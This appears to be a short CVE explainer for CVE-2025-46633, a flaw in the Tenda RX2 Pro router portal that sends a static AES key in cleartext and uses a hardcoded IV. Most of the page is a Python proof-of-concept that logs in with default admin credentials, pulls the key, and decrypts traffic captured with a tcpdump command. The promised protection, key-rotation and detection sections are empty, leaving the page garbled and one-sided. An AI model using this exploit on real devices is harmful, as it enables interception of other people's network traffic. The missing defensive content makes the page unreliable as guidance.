How CVE-2025-46633 Works:
The vulnerability exists in the web management portal of Tenda RX2 Pro firmware version 16.03.30.14. During authentication, the system transmits the AES encryption key in cleartext to authenticated clients. This key remains static across sessions, and the initialization vector (IV) is hardcoded as “EU5H62G9ICGRNI43”. Attackers can intercept this key through MITM attacks or network sniffing, then decrypt all subsequent encrypted traffic between client and server. The fixed IV enables predictable ciphertext patterns, violating cryptographic best practices. No key rotation or proper key exchange mechanism exists, making all encrypted communications vulnerable after initial key capture.
DailyCVE Form:

What Undercode Say:
PoC Exploit Code
import requests
from Crypto.Cipher import AES
def intercept_key(target_ip):
session = requests.Session()
login_data = {'username':'admin','password':'admin'}
response = session.post(f'http://{target_ip}/login', data=login_data)
return response.json()['aes_key'] Key in cleartext
def decrypt_traffic(ciphertext, key):
iv = b'EU5H62G9ICGRNI43'
cipher = AES.new(key.encode(), AES.MODE_CBC, iv)
return cipher.decrypt(ciphertext)
Network Capture Command tcpdump -i eth0 host 192.168.1.1 -w tenda_traffic.pcap
Protection Workaround

}
Key Rotation Script

MITM Detection
